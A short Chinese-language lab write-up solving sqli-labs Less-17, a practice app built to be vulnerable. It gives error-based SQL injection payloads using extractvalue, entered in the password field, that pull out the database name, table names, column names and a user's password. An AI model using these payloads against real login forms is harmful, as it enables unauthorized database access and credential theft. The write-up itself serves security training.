考察报错注入
本文使用extractvalue进行注入
原理及姿势可参考[网络安全]sqli-labs Less-5 解题详析
判断注入类型
由以下回显可知,注入类型为单引号注入
查库名
账号输入admin
密码输入:
1' and (extractvalue(1,concat(0x5c,database(),0x5c)))#
库名为security
查表名
账号输入admin
密码输入:
1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#
回显四个表
查列名
账号输入admin
密码输入:
1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#
得到三个列
查数据
账号输入admin
密码输入:
1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#
总结
以上为[网络安全]sqli-labs Less-17 解题详析,后续将分享[网络安全]sqli-labs Less-18 解题详析.
我是秋说,我们下次见。